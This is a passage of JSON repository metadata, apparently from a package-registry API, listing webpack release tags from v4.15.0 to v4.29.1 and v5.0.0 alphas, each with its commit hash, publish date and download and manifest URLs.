":"https://github.com/webpack/webpack/releases/tag/v4.29.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.1/manifests"},{"name":"v5.0.0-alpha.9","sha":"92a36b1a9c0ed554c0f7e74bf1bc98c77a768fcc","kind":"tag","published_at":"2019-01-27T12:18:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.9","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.9/manifests"},{"name":"v4.29.0","sha":"25bccd4c487a5bf743efc62947d81a8eaa81a90f","kind":"tag","published_at":"2019-01-20T17:38:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.0/manifests"},{"name":"v5.0.0-alpha.8","sha":"adff7f61a2595ea9a04c0f3070add21be01607fb","kind":"tag","published_at":"2019-01-19T19:24:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.8","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.8/manifests"},{"name":"v5.0.0-alpha.7","sha":"18aca2fcb148d04ba3d0b37742f50534d42a7ec3","kind":"tag","published_at":"2019-01-19T12:11:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.7","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.7/manifests"},{"name":"v5.0.0-alpha.6","sha":"4be6797700753a54b223600f01e941580b6a6ba3","kind":"tag","published_at":"2019-01-15T16:39:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.6","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.6/manifests"},{"name":"v4.28.4","sha":"fdb6b139b94273e5b18870262c193a93f65132e8","kind":"tag","published_at":"2019-01-10T15:48:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.28.4","html_url":"https://github.com/webpack/webpack/releases/tag/v4.28.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.28.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.4/manifests"},{"name":"v5.0.0-alpha.5","sha":"0d9ed482bc39fb23040ffd26823e0b7ed73320cb","kind":"tag","published_at":"2019-01-09T14:20:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.5","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.5/manifests"},{"name":"v5.0.0-alpha.4","sha":"b97bc4bc062cd5395de8b00115519472645d57d0","kind":"tag","published_at":"2019-01-08T14:09:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.4/manifests"},{"name":"v5.0.0-alpha.3","sha":"762155dc2da6795dfe72a5cbeb632fc42c9c49e0","kind":"tag","published_at":"2018-12-29T17:13:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.3/manifests"},{"name":"v4.28.3","sha":"983c2616ec1b869bfb659b6331bd2fe2abc66e23","kind":"tag","published_at":"2018-12-29T11:55:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.28.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.28.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.28.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.3/manifests"},{"name":"v5.0.0-alpha.2","sha":"88f0e18e64c7935723348de3b7dd1aa92050999c","kind":"tag","published_at":"2018-12-26T10:33:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.2/manifests"},{"name":"v5.0.0-alpha.1","sha":"90a0866efcd35401353c9e8d5c904fe2cd407f7e","kind":"tag","published_at":"2018-12-23T20:24:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.1/manifests"},{"name":"v4.28.2","sha":"fe514dd975f1d2dd1546906a6f4c0a6b2a0e3761","kind":"tag","published_at":"2018-12-22T12:53:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.28.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.28.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.28.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.2/manifests"},{"name":"v5.0.0-alpha.0","sha":"3f068c38610a1edfd6be2adf53a2dea44525cfde","kind":"tag","published_at":"2018-12-21T14:17:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.0/manifests"},{"name":"v4.28.1","sha":"7a6a71f1e9349f86833de12a673805621f0fc6f6","kind":"tag","published_at":"2018-12-20T17:10:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.28.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.1/manifests"},{"name":"v4.28.0","sha":"e871eeb121a69efd6cbfa56f977d5843bf030202","kind":"tag","published_at":"2018-12-19T10:37:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.28.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.0/manifests"},{"name":"v4.27.1","sha":"4056506488c1e071dfc9a0127daa61bf531170bf","kind":"tag","published_at":"2018-12-05T19:13:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.27.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.27.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.27.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.27.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.27.1/manifests"},{"name":"v4.27.0","sha":"f47bf8b64f9698cb05eff62832a04267823039cf","kind":"tag","published_at":"2018-12-04T09:31:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.27.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.27.0/manifests"},{"name":"v4.26.1","sha":"8e841feda3ef32c64df1a175d0d9f71e47cfbe8e","kind":"tag","published_at":"2018-11-25T20:25:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.26.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.26.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.26.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.26.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.26.1/manifests"},{"name":"v4.26.0","sha":"04f90c53eeae4817a9c515a0daca119d0decfa45","kind":"tag","published_at":"2018-11-19T08:39:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.26.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.26.0/manifests"},{"name":"v4.25.1","sha":"2361995a429794d372d61e3fb628dea3929e0ca4","kind":"tag","published_at":"2018-11-05T18:12:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.25.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.25.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.25.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.25.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.25.1/manifests"},{"name":"v4.25.0","sha":"290094e10a990aa3fd8073b02b4dc57781f924d7","kind":"tag","published_at":"2018-11-05T08:37:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.25.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.25.0/manifests"},{"name":"v4.24.0","sha":"9e397b5664dab3af0ceb2fa93cb5c539f02c023c","kind":"tag","published_at":"2018-11-02T12:11:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.24.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.24.0/manifests"},{"name":"v4.23.1","sha":"607cf70eddd213a690585276f7124963536781e7","kind":"tag","published_at":"2018-10-25T08:26:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.23.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.23.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.23.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.23.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.23.1/manifests"},{"name":"v4.23.0","sha":"a4feb6e15ff7ac19bab1a458de369a887dde44fe","kind":"tag","published_at":"2018-10-24T15:45:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.23.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.23.0/manifests"},{"name":"v4.22.0","sha":"894eca20bd678ca5473cfca28f332a7322c64b8e","kind":"tag","published_at":"2018-10-21T09:34:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.22.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.22.0/manifests"},{"name":"v4.21.0","sha":"432d2a3f174b08d5f4f7de018799c97a18efa1fd","kind":"tag","published_at":"2018-10-17T17:47:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.21.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.21.0/manifests"},{"name":"v4.20.2","sha":"5c5e902c8e89afeb51ad130f12a908b89d627fc5","kind":"tag","published_at":"2018-09-25T20:31:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.20.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.2/manifests"},{"name":"v4.20.1","sha":"91e9dd77062797e3e716485f295d32a5cab57042","kind":"tag","published_at":"2018-09-25T13:25:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.20.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.1/manifests"},{"name":"v4.20.0","sha":"c4d8a3c8d67239f6457fd7560d9bea14524ff4f0","kind":"tag","published_at":"2018-09-25T07:15:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.20.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.0/manifests"},{"name":"v4.19.1","sha":"b7121c15e1cc810ead6aa0f4b2aad4666c072257","kind":"tag","published_at":"2018-09-18T07:56:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.19.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.19.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.19.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.19.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.19.1/manifests"},{"name":"v4.19.0","sha":"6bf832398c3905e06300596caddb073c583d94c4","kind":"tag","published_at":"2018-09-13T22:04:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.19.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.19.0/manifests"},{"name":"v4.18.1","sha":"c51a1bab94e4ff8ffca443e4fcb038bc4911e65e","kind":"tag","published_at":"2018-09-13T10:22:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.18.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.18.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.18.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.18.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.18.1/manifests"},{"name":"v4.18.0","sha":"ee7d9485fa30d1d3d5adbfdfb52c8f57ae8b439e","kind":"tag","published_at":"2018-09-10T15:34:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.18.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.18.0/manifests"},{"name":"v4.17.3","sha":"ee27d36e7cb0bed3ca32911165bbf01fef993e48","kind":"tag","published_at":"2018-09-10T14:25:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.17.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.17.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.17.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.3/manifests"},{"name":"v4.17.2","sha":"dfe6379052598a00f13bfa4f34ac73856ddf3dd0","kind":"tag","published_at":"2018-09-03T17:25:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.17.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.17.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.17.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.2/manifests"},{"name":"v4.17.1","sha":"ff3ef5eb284ddcd3da8c3f5bef6318e873779ffe","kind":"tag","published_at":"2018-08-22T09:50:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.17.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.17.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.17.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.1/manifests"},{"name":"v4.17.0","sha":"6f1f18f84dee330ec582d4e9c075c47c9a732102","kind":"tag","published_at":"2018-08-21T08:42:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.17.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.0/manifests"},{"name":"v4.16.5","sha":"025338cc91a867768325120d325b341bdcdc4321","kind":"tag","published_at":"2018-08-06T07:13:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.5","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.5/manifests"},{"name":"v4.16.4","sha":"1e9d98cb4e52a6efc58f516aa7451d1faa6347ba","kind":"tag","published_at":"2018-08-02T13:46:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.4","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.4/manifests"},{"name":"v4.16.3","sha":"482ff200303e84a65bdd5c456ce232309a6ce450","kind":"tag","published_at":"2018-07-27T10:14:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.3/manifests"},{"name":"v4.16.2","sha":"0d4c87fcf261de02a6ecfb05faab235c5a2a92dc","kind":"tag","published_at":"2018-07-23T09:51:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.2/manifests"},{"name":"v4.16.1","sha":"fa02f3d03344913f0a02d29cb363581bc8535bef","kind":"tag","published_at":"2018-07-16T08:27:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.1/manifests"},{"name":"v4.16.0","sha":"18d33c630f799e99e5e43fc0b6931713dc976529","kind":"tag","published_at":"2018-07-11T08:45:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.0/manifests"},{"name":"v4.15.1","sha":"81149be5c1cd2a3ce70c3abcc179c5070fd6dd1c","kind":"tag","published_at":"2018-07-05T13:32:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.15.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.15.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.15.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.15.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.15.1/manifests"},{"name":"v4.15.0","sha":"bdd4442c449b41d2a0ea7ed0de9cded3ba0e2e31","kind":"tag","published_at":"2018-07-04T19:42:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.15.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.15.0","tag_url":"